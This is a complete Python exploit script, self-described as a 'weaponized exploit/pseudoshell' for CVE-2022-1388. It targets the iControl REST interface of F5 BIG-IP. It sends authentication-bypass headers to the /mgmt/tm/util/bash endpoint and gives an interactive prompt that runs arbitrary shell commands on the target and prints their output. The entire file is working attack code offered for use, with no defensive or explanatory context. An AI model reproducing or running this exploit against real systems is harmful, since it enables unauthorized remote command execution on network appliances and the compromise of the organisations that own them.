exploit.py

#05.09.2022
#impost0r
#!/usr/bin/python3

import requests
import urllib3
import argparse
import json
import sys

urllib3.disable_warnings()

parser = argparse.ArgumentParser(description="CVE-2022-1388 weaponized exploit/pseudoshell.")
parser.add_argument("-t", action="store")
args = parser.parse_args()

F5headers = {"Host" : "localhost",
       "Connection" : "keep-alive, X-F5-Auth-Token",
       "X-F5-Auth-Token" : "a",
       "Authorization" : "Basic YWRtaW46"}



while True:
    cmd = input(">")
    fmt = cmd.replace(" ", "\ ")
    payload = {"command":"run",
               "utilCmdArgs":"-c " + fmt}
    r = requests.post(f"https://{args.t}/mgmt/tm/util/bash", headers=F5headers, data=json.dumps(payload), verify=False)
    response_dict = json.loads(r.text)
    print(response_dict["commandResult"])